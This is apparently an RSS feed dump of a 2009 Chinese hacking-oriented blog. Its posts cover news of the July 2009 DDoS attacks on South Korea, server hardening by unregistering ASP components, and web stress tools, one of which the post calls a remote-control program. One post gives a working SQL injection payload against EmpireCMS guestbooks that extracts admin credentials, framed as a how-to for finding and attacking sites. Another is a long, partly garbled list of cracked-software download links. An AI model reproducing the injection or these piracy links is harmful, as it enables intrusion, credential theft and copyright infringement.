http://www.6xuan.com/index.php zh-cn http://www.6xuan.com/read.php?334 tinkoko <admin@yourname.com> Wed, 15 Jul 2009 15:41:24 +0000 http://www.6xuan.com/read.php?334
　　“我经常上韩国门户网站Naver，但从那天下午开始，该网站的电子邮件服务等怎么也登录不上。”中国三星的一位韩国籍员工向CBN记者回忆起7日下午的情景，当时还以为只是普通的故障，没想到那只是第一波黑客攻击。

　　迄今为止，韩国已经遭受了三轮大规模的网络攻击，大部分的政府网站、主要互联网门户以及媒体网站都曾因遭受攻击而瘫痪。

　　与此同时，据美国媒体报道，黑客还攻击了包括纽约证券交易所、纳斯达克股票市场公司、美国银行在内的金融机构网站。

　　直到12日晚7点，韩国国家情报院才把“7.7网络攻击”事件预警信号由“注意”下调至“关注”。

　　“网络攻击事实上已经结束。访问量恢复到了平常水平，尚未发现恶意密码中隐藏的其他攻击征兆。”韩国信息保护振兴委员会负责人终于松了口气。

　　但是搜寻这起黑客攻击的幕后元凶的工作才刚刚开始。

　　韩国国家情报院一开始就把矛头指向朝鲜，认为研发此次攻击中使用的恶意代码并加以散布的来源是朝鲜人民武力部下属“110号研究所”。

　　而更多的人则对这个草率的结论表示怀疑。昨天，韩国信息保护振兴委员会称，越南网络安全事件应急小组当天向该机构通报称，散播恶意代码的IP位于英国。

　　源头查找是如此扑朔迷离。

　　16万台电脑“参战”

　　从7日下午6点开始，韩国总统府、国会、国防部等主要政府机构网站，以及门户网站Naver、金融机构新韩银行和外换银行、主要媒体《朝鲜日报》等网站均出现了无法访问或访问速度很慢等情况。

　　其中，总统府青瓦台和大国家党网站完全瘫痪4个多小时。而美国也出现了类似情况，一些政府和金融机构网站4日至7日多次受到攻击。但情况不如韩国严重。

　　事实上，从7日开始出现的问题是，大量不明身份的网络用户同时涌入各个韩国网站，导致网站服务器在访问量过大的情况下崩溃而陷入瘫痪。

　　第二次黑客攻势高潮出现在8日上午10时，韩国总统府青瓦台、国会、国防部等部分政府机构网站再次无法连接。而Naver等网站则恢复正常。

　　到了8日下午6点多，第三轮袭击对象又扩大到防病毒软件公司和部分银行，但强度在不断衰减。

　　国内网络安全解决方案公司启明星辰相关专家表示，此次攻击除了规模大之外，有一个细节让人感到颇有技术含量：在第三轮攻击尾声，受病毒软件感染的“肉鸡”(被黑客控制的电脑)，从10日零时开始自行格式化硬盘，自动删除所有痕迹。

　　根据目前的调查数据，此次韩国共有大约25家网站受攻击。全世界74个国家的16.6万台“肉鸡电脑”，参与针对韩国和美国的攻击。其中，7.8万台“肉鸡电脑”在韩国。

　　韩方的调查显示，黑客采用的是大规模分布式拒绝服务(DDoS)攻击。

　　金山公司网络安全工程师告诉记者，目前的网络攻击中DDoS是黑客经常使用而又难以防范的攻击手段，已经被黑客使用了很多年。此种攻击手法就是向网站服务器发动超量的访问请求，从而让服务器无法处理，导致其陷入崩溃。

　　“假想敌”朝鲜

　　韩国主流媒体将这一事件称为“网络恐怖主义”。认为此次事件并非黑客炫耀个人技术，而是有组织蓄意发起敌对攻击，旨在瘫痪网站。

　　“如果全国的银行网站、电子邮件、网络新闻都没法使用，你的心情如何?”上述中国三星员工对CBN记者说，虽然此次对韩国国内民众的实际生活影响不是很大，但在舆论和民众心理方面却掀起了轩然大波。

　　韩国情报机构国情院从一开始就认为这次黑客攻击系“朝鲜或朝鲜同情者”支持，怀疑这次事件是朝鲜军方网络战机构“110号研究所”的黑客工作小组在长时间的准备下进行的。

　　据韩国《中央日报》报道，10日，韩国国家情报院向国会报告称“已经掌握了上月初向朝鲜人民武力部下属的110号研究所下达‘瞬间破坏南朝鲜傀儡通讯网’攻击命令的情报”。

　　韩国方面调查发现，黑客从分布在韩国、美国、日本、俄罗斯等19个国家的92个IP地址发起攻击，朝鲜不在其中。昨天，越南方面通告韩国信息保护振兴委员会，针对青瓦台等韩美主要机关的DDoS攻击的源头“Maste IP”在英国。

　　但是，《中央日报》在13日的报道中却言之凿凿地说，“朝鲜从2004年中期开始在中国丹东正式运营网络战争据点”，称有10多名朝鲜人常住丹东一家酒店4楼的一间115㎡的办公室中，将电脑设备和光缆网络连接起来进行运作。

　　13日，《环球时报》记者前往这家酒店探访时，发现这里根本不存所谓的“有十几台电脑的115㎡的办公室”，而酒店负责人表示“这简直就是诽谤”。

　　李明博去年上台以来，韩朝关系处于紧张状态。今年4月14日，朝鲜外务省宣布退出朝核问题六方会谈。随后，朝鲜方面又多次发射导弹并进行核试验，此举让朝鲜半岛局势愈加紧张。韩国国家情报院的上述“结论”可谓应景之作。

　　网络战一触即发?

　　尽管尚无法确认韩国“7.7网络攻击”事件是否属于“网络战争”，但这样一种简单却又充满杀伤力的黑客手段，目前也被大型的网络战采纳为主攻方式。比如去年俄罗斯与格鲁吉亚的军事冲突，俄方就用了这种方法来瘫痪对方的网络服务。

　　启明星辰安全专家吴凡分析认为，一旦用户电脑被黑客控制，利用这些“肉鸡”发起攻击的次数并不是问题，连续发起10次攻击也是有可能的。

　　韩国政府亡羊补牢，已筹集200亿韩元(约合1574万美元)紧急预算，帮助国家核心机构和主要公共机构抵御DDoS攻击。该预算将用在不具备分散路由设备的医疗、能源、证券等9个领域的网站等方面。

　　韩国军方也宣布，定于本月20日至23日举行代号“太极”的年度电脑模拟军事演习，还决定在明年设立“网络安全司令部”。

　　网络战已经是现实的威胁。目前各国的军事系统中，战机和潜艇、作战指挥、军需支援等大部分都与电脑网络相连接，如果军队内部网络被黑客入侵，让这种指挥控制自动化体系染上病毒，整个军队将处于瘫痪状态。

　　目前，美国国防部刚于6月宣布创立预备网络战争的网络统一司令部，按照计划，美军的网络司令部最迟将在今年10月进入工作状态，并于2010年年底全部投入运行。英国则出台首个国家网络安全战略，计划征召包括黑客在内的网络人才保护网络安全，并成立网络安全办公室和网络安全行动中心。


]]> http://www.6xuan.com/read.php?320 tinkoko <admin@yourname.com> Mon, 15 Jun 2009 08:36:31 +0000 http://www.6xuan.com/read.php?320 已经公布了。
而且官方也发布了最新的补丁。

大概内容

找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码



==============================

哎~ ]]> http://www.6xuan.com/read.php?311 tinkoko <admin@yourname.com> Mon, 25 May 2009 06:41:34 +0000 http://www.6xuan.com/read.php?311
1 安利直销管理系统 1.95 破解

http://down3.tiansha.net/20040430/tiansha.net-elgrgycr.rar


2 文件蒸发2.8 破解

http://down3.tiansha.net/20040430/tiansha.net-wjzvcr.rar


3 网上管家---密码管理3.2004.5.1 破解版

http://down3.tiansha.net/20040430/tiansha.net-wsgjmmglcr.rar


4 新友人事档案管理系统3.2 破解

http://down3.tiansha.net/20040430/tiansha.net-xyrscr.rar


5 明科人事工资管理系统(超强版)4.02 破解

http://down3.tiansha.net/20040430/tiansha.net-mkrsgzcr.rar


6 全球电视通V2.3.6.191 破解版

http://down3.tiansha.net/20040430/tiansha.net-qqdstcr.rar


7 反黑精英(Trojan Ender)2.6.0破解

http://down3.tiansha.net/20040430/tiansha.net-fhjycr.rar


8 个人密盘2004.6破解版

http://down3.tiansha.net/20040430/tiansha.net-grmpcr.rar


9 WebZip6.0.6.918 破解

http://down3.tiansha.net/20040430/tiansha.net-webzipcr.rar


10 邮件赔钱超级帮手PEHelper1.61.Build.82 破解版

http://down3.tiansha.net/20040430/tiansha.net-yjzqcjbscr.rar


11 玩具样品管理系统6.0 破解

http://down3.tiansha.net/20040430/tiansha.net-wjypglcr.rar


12 黄河电气管理5.05 破解

http://down3.tiansha.net/20040430/tiansha.net-hhdqglcr.rar


13 智能虿?.3 破解

http://down3.tiansha.net/20040430/tiansha.net-znjqcr.rar


15 8186名片王1.0 破解

http://down3.tiansha.net/20040430/tiansha.net-8186mpcr.rar


16 系统管家2.7 破解

http://down3.tiansha.net/20040430/tiansha.net-stgjcr.rar


17 微尔系统专家2.0 XP 修正破解

http://down3.tiansha.net/20040430/tiansha....


告屏蔽tzjcr.rar
18 SQLSERVER代理服务器 1.1.2a 破解

http://down3.tiansha.net/20040430/tiansha....sqlservercr.rar


19 局域网查看工具V1.5 破解

http://down3.tiansha.net/20040430/tiansha.net-jjwckkjcr.rar


20 51劲搜2.2破解

http://down3.tiansha.net/20040430/tiansha.net-51jscr.rar


21 易通玩具商贸系统6.0 破解

http://down3.tiansha.net/20040430/tiansha.net-ytwjcr.rar


22 网络数据库探索者8.2 破解

http://down3.tiansha.net/20040430/tiansha.net-wlsjkcr.rar


23 金排数学画板V3.5 破解

http://down3.tiansha.net/20040430/tiansha.net-jpsxhpcr.rar


24 这个杀手不太冷（IE佳佳）1.37 破解版

http://down3.tiansha.net/20040430/tiansha.net-iejjcr.rar


25 超级播放器5.6 破解

http://down3.tiansha.net/20040430/tiansha.net-cjbfqcr.rar


26 酷酷贴 2.01 破解

http://down3.tiansha.net/20040430/tiansha.net-kktcr.rar


27 星海通讯理财档案记事软件2004.05.05 破解

http://down3.tiansha.net/20040430/tiansha.net-xhtxcr.rar


28 飞宇图片管理系统1.2 破解

http://down3.tiansha.net/20040430/tiansha.net-fytpglcr.rar


29 古龙全集纪念版2004通行破解

http://down3.tiansha.net/20040430/tiansha.net-glqjcr.rar


30 每周电视指南6.7 破解

http://down3.tiansha.net/20040430/tiansha.net-mzdszncr.rar


30 腾龙备份大师2004 企业版 6.4 Build 88 稳定版 破解

http://down3.tiansha.net/20040430/tiansha.net-tlbfdscr.zip


31 美萍电脑安全卫士 V11 标准破解

http://down3.tiansha.net/20040430/tiansha.net-mpCr.rar


32 xCard名片管理系统 4.86 破解

http://down3.tiansha.net/20040430/tiansha.net-xcardcr.rar


33 WinCardMaster1.0 破解

http://down3.tiansha.net/20040430/tiansha.net-wincardcr.rar


34 奇门遁甲演义CASR 1.4 破解

http://down3.tiansha.net/20040430/tiansha.net-qmdjcr.rar


35 ADO-SQLV3.0 破解

http://down3.tiansha.net/20040430/tiansha.net-sqladocr.rar


36 大富翁6 简体中文完整硬盘版

http://203.133.0.230/download/games/puzzles/century.zip


37 生化危机3简体中文版

http://moyu.enkj.com/gamedown/??


... òì??D??°??·.EXE
38 腾龙备份大师2004 企业版 6.4 Build 88 稳定版 破解

http://down3.tiansha.net/20040430/tiansha.net-tlbfdscr.zip


39 美萍电脑安全卫士 V11 标准破解

http://down3.tiansha.net/20040430/tiansha.net-mpCr.rar


40 xCard名片管理系统 4.86 破解

http://down3.tiansha.net/20040430/tiansha.net-xcardcr.rar


41 WinCardMaster1.0 破解

http://down3.tiansha.net/20040430/tiansha.net-wincardcr.rar


42 奇门遁甲演义CASR 1.4 破解

http://down3.tiansha.net/20040430/tiansha.net-qmdjcr.rar


43 ADO-SQLV3.0 破解

http://down3.tiansha.net/20040430/tiansha.net-sqladocr.rar


44 安利直销管理系统 1.95 破解

http://down3.tiansha.net/20040430/tiansha.net-elgrgycr.rar


45 文件蒸发2.8 破解

http://down3.tiansha.net/20040430/tiansha.net-wjzvcr.rar


46 网上管家---密码管理3.2004.5.1 破解版

http://down3.tiansha.net/20040430/tiansha.net-wsgjmmglcr.rar


47 新友人事档案管理系统3.2 破解

http://down3.tiansha.net/20040430/tiansha.net-xyrscr.rar


48 明科人事工资管理系统(超强版)4.02 破解

http://down3.tiansha.net/20040430/tiansha.net-mkrsgzcr.rar


49 全球电视通V2.3.6.191 破解版

http://down3.tiansha.net/20040430/tiansha.net-qqdstcr.rar


50 反黑精英(Trojan Ender)2.6.0破解

http://down3.tiansha.net/20040430/tiansha.net-fhjycr.rar ]]> http://www.6xuan.com/read.php?297 tinkoko <admin@yourname.com> Thu, 26 Mar 2009 08:38:34 +0000 http://www.6xuan.com/read.php?297
这里感谢下二进制安全网为我做的友情链接，他们自己开发的暴风压力测试工具可以测试网络负载。
下载客户断就好了，服务器端收费，暴风也是个远控程序。类似于暗组和pc之类的。有兴趣的朋友可以测试下。

这里今天找到MS的压力测试

先给出地址
http://www.microsoft.com/err/technet/archive/itsolutions/intranet/downloads/webstres
然后在介绍

Microsoft Web Application Stress Tool 是由 微软的网站测试人员所开发，专门用来进行实际网站压力测试的一套工具。透过这套功能强大的压力测试工具，您可以使用少量的Client端计算机仿真大量用户上线对网站服务所可能造成的影响，在网站实际上线之前先对您所设计的网站进行如同真实环境下的测试，以找出系统潜在的问题，对系统进行进一步的调整、设置工作。 Microsoft Web Application Stress具有以下几个特性： 　　* 可以数种不同的方式建立测试指令：包含以手动、录制浏览器操作步骤、或直接录入IIS的记录文件、录入网站的内容及录入其它测试程序的指令等方式。 　　* 支持多种客户端接口：标准的网站应用程序C++的客户端，使用Active Server Page 客户端，或是使用Web Application Stress对象模型建立您自定的接口。. 　　* 支持多用户利用多种不同的认证方式仿真实际的情况，包含了DPA, NTLM 及 SSL等。 　　* 支持使用动态的cookie仿真定制网站实际运作场景及对话（session）的支持。 　　* 在客户端的计算机以NT 服务的方式执行仿真的工作，可在不中断测试的情况下将某些客户端的测试计算机删除。 　　* 透过集中式的 Microsoft Web Application Stress 管理员，您可以使用任意数目的客户端计算机同时进行测式的工作。 　　* 具有Bandwidth throttling （带宽遏流）的功能以仿真用户使用调制解调器上线的效果。 　　* 内建的query-string 编辑器可帮助您建立name-value pair组合的模板，并可在不同的场景测试中重复使用。 　　* 可程序化的对象模式让您可以建立您自己的测试客户端。 　　* 汇总的测试报告及丰富的性能测试资料。 　　* 支持域名系统(DNS)让您可以测试整个群集（Cluster）的机器。 　　* 使用Page group的方式来控制文件的组及测试指令的执行程序。 　　* 可自定的header让您可以仿真各种不同种类的浏览器。 　　* 可自定的指令延迟让您以更接近真实环境的方式进行测试。 网站测试概述 为了正确使用WAS进行网站的压力测试，您需要对于网站测试的方法有一初步的了解。以下的讨论将包含一些基本的概念以供参考。 网站的测试可大略分成三个主要的类别： 　　* 网站性能测试 (Performance testing) 　　* 压力测试下的网站稳定性 (Stability or stress testing) 　　* 网站承受能力评估 (Capacity planning) 网站性能测试的第一件工作就是使用测试工具对网站加压以测量网站服务器每秒可以承受的请求(Request Per Second) 的最大值。第二件工作就是找出系统性能限制的原因所在，举例来说，CPU、内存、或是后端系统所造成的反应延迟等。 在许多状况下，网站服务器的CPU是主要的性能瓶颈。测试时您可以持续加压直到性能表现开始下降，再慢慢的降低压力的程度。此时您所测试出来的最大性能即为该网站所能达到的最高值。在实际测试时，您可以通过增加压力线程(thread)，或是增加执行WAS测试程序的客户端来加压。 在网站服务器端，您可以使用性能监视工具如Performance Monitor来监视如 "System: % Total Processor Time" 及 "Web Service: Connection Attempts/sec" 或 "Active Server Pages: Requests Queued"等指针。如果CPU的资源指针已达到80%到85%，则CPU的处理能力最有可能就是整个系统的瓶颈所在。若是在压力测试的过程中CPU所被使用的比例不高而”Requests Queued”的指针一直居高不下，可能是程序正在调用服务器上的COM组件而这个组件无法有效的执行完所有的命令，因而造成了系统性能的降低。在这种情形下，服务器上的COM组件才是真正的瓶颈。 目前市场上最热门的定制网站应用程序也会对网站的性能表现有重大的影响。WAS包含了数种特性可有效的帮助您测试定制的网站应用程序。例如，您可以建立用户，让WAS可以设置并储存每一个用户的cookie。您也可以使用QueryString 编辑器帮助您建立并储存数个不同的name-value pair以便在每一次执行request时进行测试。 一般的网站测试问题 　　* 错误的测试平台，和实际上线的 production server（生产环境服务器）不同，无法测出实际的问题。 　　* 错误的测试指令，无法正确的仿真出实际上线系统真正的反应。 　　* 线程安全性问题以及不稳定的服务器COM组件。 　　* Active Server Page 的错误及GLOBAL.ASA 设置的问题。
]]> http://www.6xuan.com/read.php?294 tinkoko <admin@yourname.com> Thu, 19 Mar 2009 04:48:32 +0000 http://www.6xuan.com/read.php?294
由于担心有些网站有注入漏洞，被黑了后得到一个webshell影响服务器。便在安装服务器的时候删除了FSO,stream，WSCRIPT.SHELL等组建。结果安装nod32的杀毒软件时候（盗版，自动获取id器的），自动更新id获取器，结果提示active找不到
wscript.shell。郁闷死我了！！

最后还是要恢复wscript.shell

建议朋友如果真的为了安全一定要删除这些！
下面给出卸载和删除的方法

卸载wscript.shell对象，在cmd下或直接运行：regsvr32 /u %windir%\system32\WSHom.Ocx

　　卸载FSO对象,在cmd下或直接运行：regsvr32.exe /u %windir%\system32\scrrun.dll

　　卸载stream对象,在cmd下或直接运行： regsvr32 /s /u "C:\Program Files\Common Files\System\ado\msado15.dll"

　　如果想恢复的话只需要去掉 /U 即可重新再注册以上相关ASP组件例如：regsvr32.exe %windir%\system32\scrrun.dll



这样子就可以用了~~不过因为这个我还是放弃NOD32把~~~换成MCAFEE比较好~
]]>